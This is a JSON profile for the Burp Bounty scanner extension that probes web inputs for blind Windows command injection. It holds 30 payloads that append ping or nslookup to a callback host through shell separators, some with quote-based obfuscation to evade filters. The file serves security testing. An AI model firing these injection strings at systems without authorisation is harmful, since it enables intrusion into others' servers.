[
  {
    "ProfileName": "Blind_RCE_Windows",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      " |ping {BC}",
      " ||ping {BC}",
      " \u0026\u0026ping {BC}",
      " ;ping {BC}",
      " \u0026ping {BC}",
      " |p\u0027i\u0027n\u0027g\u0027 {BC}",
      " ||p\u0027i\u0027n\u0027g\u0027 {BC}",
      " \u0026p\u0027i\u0027n\u0027g\u0027 {BC}",
      " \u0026\u0026p\u0027i\u0027n\u0027g\u0027 {BC}",
      " ;p\u0027i\u0027n\u0027g\u0027 {BC}",
      "  |nslookup {BC}",
      " ||nslookup {BC}",
      " \u0026\u0026nslookup {BC}",
      " ;nslookup {BC}",
      " \u0026nslookup {BC}",
      " |n\u0027s\u0027l\u0027o\u0027o\u0027k\u0027u\u0027p\u0027 {BC}",
      " ||n\u0027s\u0027l\u0027o\u0027o\u0027k\u0027u\u0027p\u0027 {BC}",
      " \u0026\u0026n\u0027s\u0027l\u0027o\u0027o\u0027k\u0027u\u0027p\u0027 {BC}",
      " ;n\u0027s\u0027l\u0027o\u0027o\u0027k\u0027u\u0027p\u0027 {BC}",
      " \u0026n\u0027s\u0027l\u0027o\u0027o\u0027k\u0027u\u0027p\u0027 {BC}",
      " |p\"i\"n\"g\" {BC}",
      " ||p\"i\"n\"g\" {BC}",
      " \u0026\u0026p\"i\"n\"g\" {BC}",
      " ;p\"i\"n\"g\" {BC}",
      " \u0026p\"i\"n\"g\" {BC}",
      " |n\"s\"l\"o\"o\"k\"u\"p\" {BC}",
      " ||n\"s\"l\"o\"o\"k\"u\"p\" {BC}",
      " \u0026\u0026n\"s\"l\"o\"o\"k\"u\"p\" {BC}",
      " ;n\"s\"l\"o\"o\"k\"u\"p\" {BC}",
      " \u0026n\"s\"l\"o\"o\"k\"u\"p\" {BC}"
    ],
    "Encoder": [],
    "UrlEncode": true,
    "CharsToUrlEncode": "\u0026",
    "Grep": [],
    "Tags": [
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "Blind_RCE_Windows",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      32,
      36,
      1,
      2,
      6,
      5,
      35,
      34,
      64,
      0,
      3,
      4
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]